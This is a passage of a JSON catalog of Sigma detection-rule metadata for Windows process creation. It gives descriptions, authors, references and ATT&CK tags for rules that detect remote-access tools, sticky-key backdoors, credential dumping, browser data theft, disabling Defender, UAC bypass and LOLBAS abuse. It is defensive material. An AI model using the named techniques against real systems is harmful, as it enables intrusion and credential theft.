(Citation: Symantec Living off the Land)\n", "meta": { "author": "frack113", "creation_date": "2022-02-11", "falsepositive": [ "Legitimate use" ], "filename": "proc_creation_win_remote_access_tools_logmein.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_logmein.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d85873ef-a0f8-4c48-a53a-6b621f11729d", "value": "Remote Access Tool - LogMeIn Execution" }, { "description": "Detects child processes of the \"Trace log generation tool for Media Foundation Tools\" (Mftrace.exe) which can be abused to execute arbitrary binaries.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-09", "falsepositive": [ "Legitimate use for tracing purposes" ], "filename": "proc_creation_win_mftrace_child_process.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mftrace/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mftrace_child_process.yml" ], "tags": [ "attack.defense-evasion", "attack.t1127" ] }, "related": [ { "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3d48c9d3-1aa6-418d-98d3-8fd3c01a564e", "value": "Potential Mftrace.EXE Abuse" }, { "description": "Detects the usage and 
installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", "meta": { "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", "creation_date": "2018-03-15", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml", "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/archive/blogs/jonathantrull/detecting-sticky-key-backdoors", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml" ], "tags": [ "attack.privilege-escalation", "attack.persistence", "attack.t1546.008", "car.2014-11-003", "car.2014-11-008" ] }, "related": [ { "dest-uuid": "70e52b04-2a0c-4cea-9d18-7149f1df9dc5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2fdefcb3-dbda-401e-ae23-f0db027628bc", "value": "Sticky Key Like Backdoor Execution" }, { "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-23", "falsepositive": [ "Other legitimate network providers that are used in the environment and not filtered out by this rule" ], "filename": "proc_creation_win_registry_new_network_provider.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/troubleshoot/windows-client/setup-upgrade-and-drivers/network-provider-settings-removed-in-place-upgrade", "https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_new_network_provider.yml" ], "tags": [ 
"attack.credential-access", "attack.t1003" ] }, "related": [ { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "baef1ec6-2ca9-47a3-97cc-4cf2bda10b77", "value": "Potential Credential Dumping Attempt Using New NetworkProvider - CLI" }, { "description": "Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones are used to host the DNS records for a particular domain.", "meta": { "author": "@gott_cyber", "creation_date": "2022-07-31", "falsepositive": [ "Legitimate administration use" ], "filename": "proc_creation_win_dnscmd_discovery.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd", "https://learn.microsoft.com/en-us/azure/dns/dns-zones-records", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dnscmd_discovery.yml" ], "tags": [ "attack.discovery", "attack.execution", "attack.t1543.003" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b6457d63-d2a2-4e29-859d-4e7affc153d1", "value": "Potential Discovery Activity Via Dnscmd.EXE" }, { "description": "Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. 
This could mean that the 'rundll32' utility has been renamed in order to avoid detection", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-22", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_renamed_rundll32_dllregisterserver.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/", "https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_rundll32_dllregisterserver.yml" ], "tags": [ "attack.execution" ] }, "uuid": "2569ed8c-1147-498a-9b8c-2ad3656b10ed", "value": "Potential Renamed Rundll32 Execution" }, { "description": "Detects use of .NET InstallUtil.exe in order to download arbitrary files. The files will be written to \"%LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE\\\"\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-19", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_installutil_download.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/LOLBAS-Project/LOLBAS/pull/239", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_installutil_download.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "75edd216-1939-4c73-8d61-7f3a0d85b5cc", "value": "File Download Via InstallUtil.EXE" }, { "description": "Detects a password change for the logged-on user via \"ksetup.exe\"", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-04-06", "falsepositive": [ "Unknown" ], "filename": 
"proc_creation_win_ksetup_password_change_user.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-gb/windows-server/administration/windows-commands/ksetup", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ksetup_password_change_user.yml" ], "tags": [ "attack.execution" ] }, "uuid": "c9783e20-4793-4164-ba96-d9ee483992c4", "value": "Logged-On User Password Change Via Ksetup.EXE" }, { "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\nWeb browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\nWeb browsers typically store the credentials in an encrypted format within a credential store.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-23", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_copy_browser_data.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.003/T1555.003.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_browser_data.yml" ], "tags": [ "attack.credential-access", "attack.t1555.003" ] }, "related": [ { "dest-uuid": "58a3e6aa-4453-4cc8-a51f-4befe80b31a8", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "47147b5b-9e17-4d76-b8d2-7bac24c5ce1b", "value": "Potential Browser Data Stealing" }, { "description": "Detects the execution of netsh to configure a port forwarding rule for port 3389 (RDP), a technique used to tunnel RDP traffic through network restrictions", "meta": { "author": "Florian Roth (Nextron Systems), oscd.community", "creation_date": "2019-01-29", "falsepositive": [ "Legitimate 
administration activity" ], "filename": "proc_creation_win_netsh_port_forwarding_3389.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_port_forwarding_3389.yml" ], "tags": [ "attack.lateral-movement", "attack.defense-evasion", "attack.command-and-control", "attack.t1090" ] }, "related": [ { "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "782d6f3e-4c5d-4b8c-92a3-1d05fed72e63", "value": "RDP Port Forwarding Rule Added Via Netsh.EXE" }, { "description": "Detects attackers attempting to disable Windows Defender using Powershell", "meta": { "author": "ok @securonix invrep-de, oscd.community, frack113", "creation_date": "2020-10-12", "falsepositive": [ "Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice." 
], "filename": "proc_creation_win_powershell_disable_defender_av_security_monitoring.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://rvsec0n.wordpress.com/2020/01/24/malwares-that-bypass-windows-defender/", "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_disable_defender_av_security_monitoring.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a7ee1722-c3c5-aeff-3212-c777e4733217", "value": "Disable Windows Defender AV Security Monitoring" }, { "description": "Detects the usage of the \"reg.exe\" utility to disable PPL protection on the LSA process", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-03-22", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_reg_lsa_ppl_protection_disabled.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_lsa_ppl_protection_disabled.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.010" ] }, "related": [ { "dest-uuid": "824add00-99a1-4b15-9a2d-6c5683b7b497", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8c0eca51-0f88-4db2-9183-fdfb10c703f9", "value": "LSA PPL Protection Disabled Via Reg.EXE" }, { "description": "Detects 
suspicious execution of Sysinternals PsSuspend, where the utility is used to suspend critical processes such as AV or EDR to bypass defenses", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-03-23", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_sysinternals_pssuspend_susp_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/sysinternals/downloads/pssuspend", "https://twitter.com/0gtweet/status/1638069413717975046", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_pssuspend_susp_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4beb6ae0-f85b-41e2-8f18-8668abc8af78", "value": "Sysinternals PsSuspend Suspicious Execution" }, { "description": "Detects execution of \"aspnet_compiler.exe\" which can be abused to compile and execute C# code.", "meta": { "author": "frack113", "creation_date": "2021-11-24", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_aspnet_compiler_exectuion.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/", "https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_aspnet_compiler_exectuion.yml" ], "tags": [ "attack.defense-evasion", "attack.t1127" ] }, "related": [ { "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a01b8329-5953-4f73-ae2d-aa01e1f35f00", "value": 
"AspNetCompiler Execution" }, { "description": "Detects Devtoolslauncher.exe, a Microsoft binary listed by the LOLBAS project, being used to launch another binary (proxy execution)", "meta": { "author": "Beyu Denis, oscd.community (rule), @_felamos (idea)", "creation_date": "2019-10-12", "falsepositive": [ "Legitimate use of devtoolslauncher.exe by a legitimate user" ], "filename": "proc_creation_win_lolbin_devtoolslauncher.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/_felamos/status/1179811992841797632", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devtoolslauncher/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_devtoolslauncher.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6", "value": "Devtoolslauncher.exe Executes Specified Binary" }, { "description": "Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in", "meta": { "author": "Tim Rauch, Elastic (idea)", "creation_date": "2022-09-27", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.elastic.co/guide/en/security/current/uac-bypass-via-windows-firewall-snap-in-hijack.html#uac-bypass-via-windows-firewall-snap-in-hijack", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1548" ] }, "related": [ { "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": 
"related-to" } ], "uuid": "e52cb31c-10ed-4aea-bcb7-593c9f4a315b", "value": "UAC Bypass via Windows Firewall Snap-In Hijack" }, { "description": "Detects the execution of an AnyDesk binary with a version prior to 8.0.8.\nPrior to version 8.0.8, the Anydesk application used a signing certificate that got compromised by threat actors.\nUse this rule to detect instances of older versions of Anydesk using the compromised certificate\nThis is recommended in order to avoid attackers leveraging the certificate and signing their binaries to bypass detections.\n", "meta": { "author": "Sai Prashanth Pulisetti, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2024-02-08", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_remote_access_tools_anydesk_revoked_cert.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.bleepingcomputer.com/news/security/anydesk-says-hackers-breached-its-production-servers-reset-passwords/", "https://anydesk.com/en/changelog/windows", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_anydesk_revoked_cert.yml" ], "tags": [ "attack.execution", "attack.initial-access" ] }, "uuid": "41f407b5-3096-44ea-a74f-96d04fbc41be", "value": "Remote Access Tool - AnyDesk Execution With Known Revoked Signing Certificate" }, { "description": "Detects a potentially suspicious parent of \"csc.exe\", which could be a sign of payload delivery.", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)", "creation_date": "2019-02-11", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_csc_susp_parent.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://reaqta.com/2017/11/short-journey-darkvnc/", "https://www.uptycs.com/blog/warzonerat-can-now-evade-with-process-hollowing", 
"https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/yellow-liderc-ships-its-scripts-delivers-imaploader-malware.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_csc_susp_parent.yml" ], "tags": [ "attack.execution", "attack.t1059.005", "attack.t1059.007", "attack.defense-evasion", "attack.t1218.005", "attack.t1027.004" ] }, "related": [ { "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "840a987a-99bd-4a80-a5c9-0cb2baa6cade", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "c726e0a2-a57a-4b7b-a973-d0f013246617", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b730a276-6b63-41b8-bcf8-55930c8fc6ee", "value": "Csc.EXE Execution Form Potentially Suspicious Parent" }, { "description": "Detects the execution of SharpMove, a .NET utility performing multiple tasks such as \"Task Creation\", \"SCM\" query, VBScript execution using WMI via its PE metadata and command line options.\n", "meta": { "author": "Luca Di Bartolomeo (CrimpSec)", "creation_date": "2024-01-29", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_sharpmove.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/0xthirteen/SharpMove/", "https://pentestlab.blog/tag/sharpmove/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sharpmove.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.002" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "055fb54c-a8f4-4aee-bd44-f74cf30a0d9d", "value": "HackTool - SharpMove Tool Execution" }, { "description": "Detects the execution of \"reg.exe\" to alter registry keys that would replace the user's desktop background.\nThis is a common technique used by malware to change the desktop background to a ransom note or other image.\n", "meta": { "author": "Stephen Lincoln @slincoln-aiq (AttackIQ)", "creation_date": "2023-12-21", "falsepositive": [ "Administrative scripts that change the desktop background to a company logo or other image." ], "filename": "proc_creation_win_reg_desktop_background_change.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/en_us/research/23/h/an-overview-of-the-new-rhysida-ransomware.html", "https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.ControlPanelDisplay::CPL_Personalization_NoDesktopBackgroundUI", "https://research.checkpoint.com/2023/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/", "https://www.attackiq.com/2023/09/20/emulating-rhysida/", "https://www.virustotal.com/gui/file/a864282fea5a536510ae86c77ce46f7827687783628e4f2ceb5bf2c41b8cd3c6/behavior", "https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.WindowsDesktop::Wallpaper", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_desktop_background_change.yml" ], "tags": [ "attack.defense-evasion", "attack.impact", "attack.t1112", "attack.t1491.001" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "8c41090b-aa47-4331-986b-8c9a51a91103", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 
"8cbc9475-8d05-4e27-9c32-df960716c701", "value": "Potentially Suspicious Desktop Background Change Using Reg.EXE" }, { "description": "Detects execution of VisualUiaVerifyNative.exe, a Windows SDK binary that can be used for application whitelisting (AWL/WDAC) bypass and is listed in Microsoft's recommended WDAC block rules.", "meta": { "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", "creation_date": "2022-06-01", "falsepositive": [ "Legitimate testing of Microsoft UI parts." ], "filename": "proc_creation_win_lolbin_visualuiaverifynative.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad", "https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/VisualUiaVerifyNative/", "https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/design/applications-that-can-bypass-wdac", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b30a8bc5-e21b-4ca2-9420-0a94019ac56a", "value": "Use of VisualUiaVerifyNative.exe" }, { "description": "Detects suspicious launch of the PSEXESVC service on this system and a child process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. 
the administrator account)", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-07-21", "falsepositive": [ "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" ], "filename": "proc_creation_win_sysinternals_psexesvc_as_system.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/sysinternals/downloads/psexec", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_psexesvc_as_system.yml" ], "tags": [ "attack.execution" ] }, "uuid": "7c0dcd3d-acf8-4f71-9570-f448b0034f94", "value": "PsExec Service Child Process Execution as LOCAL SYSTEM" }, { "description": "Detects execution of wmic utility with the \"computersystem\" flag in order to obtain information about the machine such as the domain, username, model, etc.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-08", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wmic_recon_computersystem.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_computersystem.yml" ], "tags": [ "attack.discovery", "attack.execution", "attack.t1047" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f", "value": "Computer System Reconnaissance Via Wmic.EXE" }, { "description": "Detects execution of the Impersonate tool. 
It can be used to manipulate access tokens on Windows computers remotely (PsExec/WmiExec) or interactively", "meta": { "author": "Sai Prashanth Pulisetti @pulisettis", "creation_date": "2022-12-21", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_impersonate.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://sensepost.com/blog/2022/abusing-windows-tokens-to-compromise-active-directory-without-touching-lsass/", "https://github.com/sensepost/impersonate", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_impersonate.yml" ], "tags": [ "attack.privilege-escalation", "attack.defense-evasion", "attack.t1134.001", "attack.t1134.003" ] }, "related": [ { "dest-uuid": "86850eff-2729-40c3-b85e-c4af26da4a2d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "8cdeb020-e31e-4f88-a582-f53dcfbda819", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cf0c254b-22f1-4b2b-8221-e137b3c0af94", "value": "HackTool - Impersonate Execution" }, { "description": "Detects calls to \"SyncInvoke\", which is part of the \"CL_Invocation.ps1\" script, to proxy execution using \"System.Diagnostics.Process\"", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), oscd.community, Natalia Shornikova", "creation_date": "2020-10-14", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_cl_invocation.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/bohops/status/948061991012327424", "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cl_invocation.yml" ], "tags": [ "attack.defense-evasion", "attack.t1216" ] }, "related": 
[ { "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a0459f02-ac51-4c09-b511-b8c9203fc429", "value": "Potential Process Execution Proxy Via CL_Invocation.ps1" }, { "description": "Detects usage of Sysinternals PsService which can be abused for service reconnaissance and tampering", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-16", "falsepositive": [ "Legitimate use of PsService by an administrator" ], "filename": "proc_creation_win_sysinternals_psservice.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/sysinternals/downloads/psservice", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_psservice.yml" ], "tags": [ "attack.discovery", "attack.persistence", "attack.t1543.003" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3371f518-5fe3-4cf6-a14b-2a0ae3fd8a4f", "value": "Sysinternals PsService Execution" }, { "description": "Detects potentially suspicious child processes of a ClickOnce deployment application", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-06-12", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_dfsvc_suspicious_child_processes.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dfsvc_suspicious_child_processes.yml" ], "tags": [ "attack.execution", "attack.defense-evasion" ] }, "uuid": 
"67bc0e75-c0a9-4cfc-8754-84a505b63c04", "value": "Potentially Suspicious Child Process Of ClickOnce Application" }, { "description": "Detects use of the shutdown command line utility to shut down or reboot Windows, which adversaries may use to disrupt availability or cover their tracks after a destructive action", "meta": { "author": "frack113", "creation_date": "2022-01-01", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_shutdown_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shutdown_execution.yml" ], "tags": [ "attack.impact", "attack.t1529" ] }, "related": [ { "dest-uuid": "ff73aa03-0090-4464-83ac-f89e233c02bc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "34ebb878-1b15-4895-b352-ca2eeb99b274", "value": "Suspicious Execution of Shutdown" }, { "description": "Detects potentially suspicious child processes of \"Diskshadow.exe\". 
This could be an attempt to bypass parent/child relationship detection or application whitelisting rules.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-09-15", "falsepositive": [ "False positives can occur in cases where admin scripts leverage the \"exec\" flag to execute applications" ], "filename": "proc_creation_win_diskshadow_child_process_susp.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow", "https://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware", "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", "https://research.checkpoint.com/2022/evilplayout-attack-against-irans-state-broadcaster/", "https://www.lifars.com/wp-content/uploads/2022/01/GriefRansomware_Whitepaper-2.pdf", "https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/", 